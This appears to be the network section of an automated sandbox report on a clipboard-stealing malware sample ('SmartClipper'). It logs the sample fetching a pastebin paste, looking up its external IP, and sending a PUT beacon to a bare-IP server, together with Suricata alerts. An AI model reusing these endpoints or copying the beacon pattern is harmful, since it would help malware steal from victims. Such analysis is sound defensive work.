Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
pastebin.com | 104.20.67.143 | |
ip-api.com | 208.95.112.1 |
GET
200
https://pastebin.com/raw/aCZb2pjR
REQUEST
RESPONSE
BODY
GET /raw/aCZb2pjR HTTP/1.1
Connection: Keep-Alive
User-Agent: SmartClipper
Host: pastebin.com
HTTP/1.1 200 OK
Date: Sun, 23 Apr 2023 23:57:53 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Sun, 23 Apr 2023 15:42:00 GMT
Server: cloudflare
CF-RAY: 7bca0d290d4d0914-LAX
GET
200
http://ip-api.com/json/?fields=query,status,countryCode,city,timezone
REQUEST
RESPONSE
BODY
GET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
Content-Type: application/json
User-Agent: SmartClipper
Host: ip-api.com
HTTP/1.1 200 OK
Date: Sun, 23 Apr 2023 23:57:09 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 107
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET
301
http://pastebin.com/raw/aCZb2pjR
REQUEST
RESPONSE
BODY
GET /raw/aCZb2pjR HTTP/1.1
Content-Type: application/json
User-Agent: SmartClipper
Host: pastebin.com
HTTP/1.1 301 Moved Permanently
Date: Sun, 23 Apr 2023 23:57:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 24 Apr 2023 00:57:52 GMT
Location: https://pastebin.com/raw/aCZb2pjR
Server: cloudflare
CF-RAY: 7bca0d24af367d64-LAX
PUT
200
http://185.159.130.81/clpr/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys
REQUEST
RESPONSE
BODY
PUT /clpr/OWUsN2UsODMsOWIsOWUsODIsOTAsOTEsNjQsN2Ys HTTP/1.1
Content-Type: application/json
User-Agent: SmartClipper
Host: 185.159.130.81
Content-Length: 603
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 23 Apr 2023 23:57:54 GMT
Content-Type: application/json
Content-Length: 2186
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1oSjcRjYgoBMbX1qWc7SP76X8KWHzdF4%2FVgCkdRtLGKWlEgcCrmTYbAzhpuYrvB88%2FrOf9m4qyTwA%2F9O6Xpl2odvc23VsC3dKB7%2B%2FQveKjgmWcEtIAlt1aDWx8jDoXB%2Bqw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
CF-RAY: 7bca0d2eae78fe3c-HEL
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49168 -> 208.95.112.1:80 | 2022082 | ET POLICY External IP Lookup ip-api.com | Device Retrieving External IP Address Detected |
TCP 192.168.56.101:49247 -> 104.20.67.143:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49247 104.20.67.143:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 79:b7:9c:ec:8a:be:ea:82:0d:16:04:fb:46:5f:89:6b:78:b9:43:fd |
Snort Alerts
No Snort Alerts